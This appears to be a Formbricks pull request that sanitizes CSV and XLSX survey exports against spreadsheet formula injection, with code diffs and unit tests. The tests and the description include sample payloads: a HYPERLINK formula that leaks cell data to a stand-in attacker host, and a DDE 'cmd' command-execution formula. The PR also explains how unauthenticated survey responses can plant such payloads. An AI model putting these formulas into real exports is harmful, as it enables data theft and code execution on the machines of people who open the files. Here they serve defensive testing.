### PR TITLE
fix: sanitize CSV/XLSX exports against formula injection

### DIFF
--- a/apps/web/lib/utils/file-conversion.test.ts
+++ b/apps/web/lib/utils/file-conversion.test.ts
@@ -38,6 +38,38 @@ describe("convertToCsv", () => {
 
     parseSpy.mockRestore();
   });
+
+  test("should defang formula injection payloads in cell values", async () => {
+    const payloads = [
+      '=HYPERLINK("https://evil.tld","Click")',
+      "+1+1",
+      "-2+3",
+      "@SUM(A1:A2)",
+      "\tleading-tab",
+      "\rleading-cr",
+    ];
+    const rows = payloads.map((p) => ({ name: p, age: 0 }));
+    const csv = await convertToCsv(["name", "age"], rows);
+    const lines = csv.trim().split("\n").slice(1); // drop header
+    payloads.forEach((p, i) => {
+      // each value should be prefixed with a single quote so the spreadsheet
+      // app treats it as text rather than a formula
+      expect(lines[i].startsWith(`"'${p.charAt(0)}`)).toBe(true);
+    });
+  });
+
+  test("should defang formula injection in field/header names", async () => {
+    const csv = await convertToCsv(["=evil", "age"], [{ "=evil": "x", age: 1 }]);
+    const lines = csv.trim().split("\n");
+    expect(lines[0]).toBe('"\'=evil","age"');
+    expect(lines[1]).toBe('"x",1');
+  });
+
+  test("should not alter benign strings", async () => {
+    const csv = await convertToCsv(["name"], [{ name: "Alice = Bob" }]);
+    const lines = csv.trim().split("\n");
+    expect(lines[1]).toBe('"Alice = Bob"');
+  });
 });
 
 describe("convertToXlsxBuffer", () => {
@@ -59,5 +91,16 @@ describe("convertToXlsxBuffer", () => {
     });
     const cleaned = raw.map(({ __rowNum__, ...rest }) => rest);
     expect(cleaned).toEqual(data);
+  });
+
+  test("should defang formula injection payloads in xlsx cells", () => {
+    const payload = '=HYPERLINK("https://evil.tld","Click")';
+    const buffer = convertToXlsxBuffer(["name"], [{ name: payload }]);
+    const wb = xlsx.read(buffer, { type: "buffer" });
+    const sheet = wb.Sheets["Sheet1"];
+    const cell = sheet["A2"];
+    // value stored as plain text, not as a formula (no `f` property)
+    expect(cell.f).toBeUndefined();
+    expect(cell.v).toBe(`'${payload}`);
   });
 });

--- a/apps/web/lib/utils/file-conversion.test.ts
+++ b/apps/web/lib/utils/file-conversion.test.ts
@@ -70,6 +70,18 @@ describe("convertToCsv", () => {
     const lines = csv.trim().split("\n");
     expect(lines[1]).toBe('"Alice = Bob"');
   });
+
+  test("should preserve distinct columns whose labels collide after sanitization", async () => {
+    // "=field" and "'=field" both render as "'=field" once defanged, but the
+    // underlying row keys must stay distinct so neither cell is dropped.
+    const csv = await convertToCsv(
+      ["=field", "'=field"],
+      [{ "=field": "a", "'=field": "b" }]
+    );
+    const lines = csv.trim().split("\n");
+    expect(lines[0]).toBe('"\'=field","\'=field"');
+    expect(lines[1]).toBe('"a","b"');
+  });
 });
 
 describe("convertToXlsxBuffer", () => {
@@ -123,7 +135,23 @@ describe("convertToXlsxBuffer", () => {
     expect(headerCell.v).toBe("'=evil");
     // benign header untouched
     expect(sheet["B1"].v).toBe("name");
-    // data row mapped via sanitized key
+    // data row mapped via original key
     expect(sheet["A2"].v).toBe("x");
+    expect(sheet["B2"].v).toBe("Alice");
+  });
+
+  test("should preserve distinct xlsx columns whose labels collide after sanitization", () => {
+    // Original keys "=field" and "'=field" both render as "'=field"; ensure
+    // both cells survive instead of one overwriting the other.
+    const buffer = convertToXlsxBuffer(
+      ["=field", "'=field"],
+      [{ "=field": "a", "'=field": "b" }]
+    );
+    const wb = xlsx.read(buffer, { type: "buffer" });
+    const sheet = wb.Sheets["Sheet1"];
+    expect(sheet["A1"].v).toBe("'=field");
+    expect(sheet["B1"].v).toBe("'=field");
+    expect(sheet["A2"].v).toBe("a");
+    expect(sheet["B2"].v).toBe("b");
   });
 });

--- a/apps/web/lib/utils/file-conversion.test.ts
+++ b/apps/web/lib/utils/file-conversion.test.ts
@@ -94,13 +94,36 @@ describe("convertToXlsxBuffer", () => {
   });
 
   test("should defang formula injection payloads in xlsx cells", () => {
-    const payload = '=HYPERLINK("https://evil.tld","Click")';
-    const buffer = convertToXlsxBuffer(["name"], [{ name: payload }]);
+    const payloads = [
+      '=HYPERLINK("https://evil.tld","Click")',
+      "+1+1",
+      "-2+3",
+      "@SUM(A1:A2)",
+      "\tleading-tab",
+      "\rleading-cr",
+    ];
+    const rows = payloads.map((p) => ({ name: p }));
+    const buffer = convertToXlsxBuffer(["name"], rows);
     const wb = xlsx.read(buffer, { type: "buffer" });
     const sheet = wb.Sheets["Sheet1"];
-    const cell = sheet["A2"];
-    // value stored as plain text, not as a formula (no `f` property)
-    expect(cell.f).toBeUndefined();
-    expect(cell.v).toBe(`'${payload}`);
+    payloads.forEach((p, i) => {
+      const cell = sheet[`A${i + 2}`]; // row 1 is header
+      // value stored as plain text, not as a formula (no `f` property)
+      expect(cell.f).toBeUndefined();
+      expect(cell.v).toBe(`'${p}`);
+    });
+  });
+
+  test("should defang formula injection in xlsx header names", () => {
+    const buffer = convertToXlsxBuffer(["=evil", "name"], [{ "=evil": "x", name: "Alice" }]);
+    const wb = xlsx.read(buffer, { type: "buffer" });
+    const sheet = wb.Sheets["Sheet1"];
+    const headerCell = sheet["A1"];
+    expect(headerCell.f).toBeUndefined();
+    expect(headerCell.v).toBe("'=evil");
+    // benign header untouched
+    expect(sheet["B1"].v).toBe("name");
+    // data row mapped via sanitized key
+    expect(sheet["A2"].v).toBe("x");
   });
 });

--- a/apps/web/lib/utils/file-conversion.ts
+++ b/apps/web/lib/utils/file-conversion.ts
@@ -4,6 +4,9 @@ import { logger } from "@formbricks/logger";
 
 // Defang spreadsheet formula injection. Cell values starting with
 // =, +, -, @, tab, or CR are evaluated as formulas by Excel/Sheets/Numbers.
+// Sanitize at the render boundary only — never rewrite row keys, since
+// distinct user-controlled labels could collide after prefixing (e.g.
+// "=field" and "'=field" both map to "'=field"), dropping cell data.
 const FORMULA_TRIGGER = /^[=+\-@\t\r]/;
 
 const sanitizeFormulaInjection = <T>(value: T): T => {
@@ -13,25 +16,20 @@ const sanitizeFormulaInjection = <T>(value: T): T => {
   return value;
 };
 
-const sanitizeRows = (rows: Record<string, string | number>[]): Record<string, string | number>[] =>
-  rows.map((row) =>
-    Object.fromEntries(
-      Object.entries(row).map(([key, value]) => [
-        sanitizeFormulaInjection(key),
-        sanitizeFormulaInjection(value),
-      ])
-    )
-  );
-
 export const convertToCsv = async (fields: string[], jsonData: Record<string, string | number>[]) => {
   let csv: string = "";
 
+  // Field descriptors preserve the original lookup key while overriding the
+  // rendered label and cell value with sanitized versions.
   const parser = new AsyncParser({
-    fields: fields.map(sanitizeFormulaInjection),
+    fields: fields.map((name) => ({
+      label: sanitizeFormulaInjection(name),
+      value: (row: Record<string, string | number>) => sanitizeFormulaInjection(row[name]),
+    })),
   });
 
   try {
-    csv = await parser.parse(sanitizeRows(jsonData)).promise();
+    csv = await parser.parse(jsonData).promise();
   } catch (err) {
     logger.error(err, "Failed to convert to CSV");
     throw new Error("Failed to convert to CSV");
@@ -44,10 +42,13 @@ export const convertToXlsxBuffer = (
   fields: string[],
   jsonData: Record<string, string | number>[]
 ): Buffer => {
+  // Build as array-of-arrays so original row keys are looked up before
+  // sanitization is applied to the rendered header/cell only.
+  const headerRow = fields.map(sanitizeFormulaInjection);
+  const dataRows = jsonData.map((row) => fields.map((name) => sanitizeFormulaInjection(row[name])));
+
   const wb = xlsx.utils.book_new();
-  const ws = xlsx.utils.json_to_sheet(sanitizeRows(jsonData), {
-    header: fields.map(sanitizeFormulaInjection),
-  });
+  const ws = xlsx.utils.aoa_to_sheet([headerRow, ...dataRows]);
   xlsx.utils.book_append_sheet(wb, ws, "Sheet1");
   return xlsx.write(wb, { type: "buffer", bookType: "xlsx" });
 };

--- a/apps/web/lib/utils/file-conversion.ts
+++ b/apps/web/lib/utils/file-conversion.ts
@@ -2,15 +2,36 @@ import { AsyncParser } from "@json2csv/node";
 import * as xlsx from "xlsx";
 import { logger } from "@formbricks/logger";
 
+// Defang spreadsheet formula injection. Cell values starting with
+// =, +, -, @, tab, or CR are evaluated as formulas by Excel/Sheets/Numbers.
+const FORMULA_TRIGGER = /^[=+\-@\t\r]/;
+
+const sanitizeFormulaInjection = <T>(value: T): T => {
+  if (typeof value === "string" && FORMULA_TRIGGER.test(value)) {
+    return `'${value}` as T;
+  }
+  return value;
+};
+
+const sanitizeRows = (rows: Record<string, string | number>[]): Record<string, string | number>[] =>
+  rows.map((row) =>
+    Object.fromEntries(
+      Object.entries(row).map(([key, value]) => [
+        sanitizeFormulaInjection(key),
+        sanitizeFormulaInjection(value),
+      ])
+    )
+  );
+
 export const convertToCsv = async (fields: string[], jsonData: Record<string, string | number>[]) => {
   let csv: string = "";
 
   const parser = new AsyncParser({
-    fields,
+    fields: fields.map(sanitizeFormulaInjection),
   });
 
   try {
-    csv = await parser.parse(jsonData).promise();
+    csv = await parser.parse(sanitizeRows(jsonData)).promise();
   } catch (err) {
     logger.error(err, "Failed to convert to CSV");
     throw new Error("Failed to convert to CSV");
@@ -24,7 +45,9 @@ export const convertToXlsxBuffer = (
   jsonData: Record<string, string | number>[]
 ): Buffer => {
   const wb = xlsx.utils.book_new();
-  const ws = xlsx.utils.json_to_sheet(jsonData, { header: fields });
+  const ws = xlsx.utils.json_to_sheet(sanitizeRows(jsonData), {
+    header: fields.map(sanitizeFormulaInjection),
+  });
   xlsx.utils.book_append_sheet(wb, ws, "Sheet1");
   return xlsx.write(wb, { type: "buffer", bookType: "xlsx" });
 };


### PR DESCRIPTION
  ## What does this PR do?
Fixes https://linear.app/formbricks/issue/ENG-813/
  Defangs spreadsheet formula injection (CWE-1236) in survey response exports. Cell values starting with `=`, `+`, `-`, `@`, `\t`, or `\r` are interpreted as formulas by
  Excel, Google Sheets, and Numbers — opening a CSV/XLSX exported from Formbricks could execute attacker-supplied formulas (e.g.
  `=HYPERLINK("https://attacker.tld/x?d="&A1,"Click me")` for data exfiltration, or `=cmd|'/c calc'!A1` for DDE-based command execution on older Excel configurations).

  Since survey responses can be submitted unauthenticated via `POST /api/v1/client/[workspaceId]/responses`, any attacker who knows a workspace ID and an active survey ID can
   plant malicious payloads in open-text answers, hidden fields, contact attributes, or variables. These flow into `convertToCsv` / `convertToXlsxBuffer` unchanged and
  execute when the workspace admin opens the export.

  Mitigation: prepend a single quote (`'`) to any string starting with a formula trigger character before passing rows to `@json2csv` or `xlsx.utils.json_to_sheet`. Applied
  to both cell values and field/header names (choice labels, variable names, hidden field names can also be attacker-influenced). Sanitization is centralized in
  `apps/web/lib/utils/file-conversion.ts` so every downstream caller (`getResponsesXlsx`, summary CSV export) is covered by a single chokepoint.

  Fixes #(issue)

  ## How should this be tested?

  - Create a survey with an open-text question. Submit a response with the answer `=HYPERLINK("https://example.com","click")`.
  - Export responses as CSV and as XLSX from the responses page.
  - Open both files in Excel, Google Sheets, and Numbers — verify the cell shows the literal string and is not evaluated as a formula or hyperlink.
  - Repeat with `+1+1`, `-2+3`, `@SUM(A1:A2)`, leading tab (`\t`), and leading carriage return (`\r`) payloads.
  - Verify benign strings containing `=` mid-value (e.g. `Alice = Bob`) are unchanged.
  - Run the unit tests: `pnpm vitest run apps/web/lib/utils/file-conversion.test.ts` — 7 tests should pass, including 4 new ones covering formula defanging in cells, headers,
   and XLSX output.
  - Confirm response service tests still pass: `pnpm vitest run apps/web/lib/response/tests/response.test.ts` (38 tests).

  ## Checklist

  ### Required

  - [x] Filled out the "How to test" section in this PR
  - [x] Read [How we Code at Formbricks](https://formbricks.com/docs/contributing/how-we-code)
  - [x] Self-reviewed my own code
  - [x] Commented on my code in hard-to-understand bits
  - [x] Ran `pnpm build`
  - [x] Checked for warnings, there are none
  - [x] Removed all `console.logs`
  - [x] Merged the latest changes from main onto my branch with `git pull origin main`
  - [x] My changes don't cause any responsiveness issues
  - [ ] First PR at Formbricks? [Please sign the CLA!](https://cla-assistant.io/formbricks/formbricks) Without it we wont be able to merge it 🙏

  ### Appreciated

  - [ ] If a UI change was made: Added a screen recording or screenshots to this PR (n/a — backend-only)
  - [ ] Updated the Formbricks Docs if changes were necessary (n/a — internal sanitization, no behavior change for users)